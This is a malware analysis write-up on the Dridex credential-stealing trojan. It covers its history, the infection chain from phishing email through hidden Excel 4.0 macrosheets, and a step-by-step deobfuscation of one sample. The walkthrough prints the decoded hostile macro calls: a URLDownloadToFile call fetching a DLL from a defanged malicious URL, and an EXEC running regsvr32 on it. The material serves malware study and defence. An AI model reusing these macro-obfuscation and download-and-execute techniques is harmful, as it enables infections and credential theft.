Dridex

An evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term. – OxCERT

History

Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware As of 2015, Yakubets maintained control of the Dridex malware

• First dridex apeard on the chart was back in 2014 June
• moving on it started creating its army of botnets(mid 2014- mid 2015)
• botnet was taken down by USA in late 2015
• it resurfaced again in 2016 and assembelled more that 30 botnets.
• By the mid of july 2017 dridex started ransomware infection, likes of Bitpaymer, DoppelPaymer, WastedLocker

funfact: botnets are named after there botnet IDs like 10111, 40200, 40300 etc

Mechanism

Malspam(email)–> Maldoc(excel/word)+macro –> VBA macro –> powershell script –> payload download –> payload execution

Mostly the Maldoc are excel documents and the urls are obfuscated as cell contents. then VBA function de-obfuscate the sheet and downlaod the payload either using powershell or Windows API, moslty powershell.

Sample used : f06910daadc7c66c8e9064d0719ed6727d69c1f04ab13566cadbb6e7a9f52a7e maldoc: thanks to abuse.ch

Initial Access :

Phishing:

    Spearphish Attachment : compressed macros docs, Pdfs, Js, Jar, etc
    Spearphish Link : link to above compressed files (Mostly Compromised and public Cloud storage are used)

Execution:

Command and Scripting Interpreter:

    Macro
    Powershell

Use olevba3 to extract the macrosheet or use openpyxl to get the cell contents.

This sample is using XML macrosheets which is still(for 30 years if i am not wrong) there to support backward compatibility.Now VBA macros are used instead of macrosheets. Execution is from left to right AND top to bottom cell in xls macrosheet All sheets are hidden,

Sheets are heaviliy ofuscated.

Code to get cell contents:

import openpyxl
book = openpyxl.load_workbook('binary.xlsm')
for w in book.worksheets:
   s = book.get_sheet_by_name(w.title)
   for r in s.rows:
       for c in r:
         if c.value != None:
           print c,c.value

### Keywords #### FORMULA.FILL : to put data or formula to the cell. FORMULA.FILL('Doc2'!AP94&'Doc1'!AW54&'Doc1'!AY54&'Doc1'!AV68&'Doc1'!AX68&'Doc1'!AZ68&".html",'Doc1'!AM23) #### Workbook.hide : it will hide the sheets WORKBOOK.HIDE("Doc1",1) #### SET.VALUE: to set value of cell SET.VALUE(AM19,AV39&'Doc1'!AV40&'Doc1'!AV41&'Doc1'!AV42&'Doc1'!AV43) #### CALL : In Macrosheet you can call functions from the cell :) Even you can call the DLL fucntion using CALL function. (urlmon.urldownloadtofile()) CALL('Doc1'!AM19&"n",'Doc1'!AM20&"A",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM23,'Doc1'!AO15&".dll",0,0) #### EXEC : it will execute the code provided as argument. EXEC(AM34&AO15) #### & : it will just concat the strings.

Demo sequence:

    decode the call urls
    decode the call function
    run the downlaoded dll. ```
    <Cell u'Doc1'.AO20> =EXEC(**AM34**&**AO15**) = **regsvr32 -s ..\ghnrope**
    AM34 = SET.VALUE(AM34,AO73)
        AO73 = <Cell u'Doc1'.AO73> =**"regsvr32 -s "**    
    <Cell u'Doc1'.AO15> =**"..\ghnrope"**
    CALL('Doc1'!AM19&"n",'Doc1'!AM20&"A",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM23,'Doc1'!AO15&".dll",0,0)
    AM19 = SET.VALUE(AM19,AV39&'Doc1'!AV40&'Doc1'!AV41&'Doc1'!AV42&'Doc1'!AV43) = URLMo
            <Cell u'Doc1'.AV39> =CHAR(85)
            <Cell u'Doc1'.AV40> R
            <Cell u'Doc1'.AV41> L
            <Cell u'Doc1'.AV42> M
            <Cell u'Doc1'.AV43> o
   AM20=SET.VALUE(AM20,'Doc2'!AQ74&'Doc2'!AQ75&'Doc2'!AQ76&'Doc2'!AQ77&'Doc2'!AQ78&'Doc2'!AQ79&'Doc2'!AQ80&'Doc2'!AQ81&'Doc2'!AQ82&'Doc2'!AQ83&'Doc2'!AQ84&'Doc2'!AQ85&'Doc2'!AQ86&'Doc2'!AQ87&'Doc2'!AQ88&'Doc2'!AQ89&'Doc2'!AQ90)
   Similarl as above : URLDownloadToFile
  AM30 =  SET.VALUE(AM30,'Doc2'!AR74&'Doc2'!AR75&'Doc2'!AR76&'Doc2'!AR77&'Doc2'!AR78&'Doc2'!AR79)
    AM30= JJCCBB
  AR84 = 0
  AM23 =FORMULA.FILL('Doc2'!AP94&'Doc1'!AW54&'Doc1'!AY54&'Doc1'!AV68&'Doc1'!AX68&'Doc1'!AZ68&".html",'Doc1'!AM23)
    http[:]//runolfsson-jayde07s.ru.com/ind[.]html
    AO15 = ..\ghnrope`    ```

CALL(“URLMo”&”n”,”URLDownloadToFile”&”A”,JJCCBB,0,”http[:]//runolfsson-jayde07s.ru.com/ind[.]html”,”..\ghnrope”&”.dll”)

more reading https://superuser.com/questions/1253212/what-is-macro-worksheet-in-excel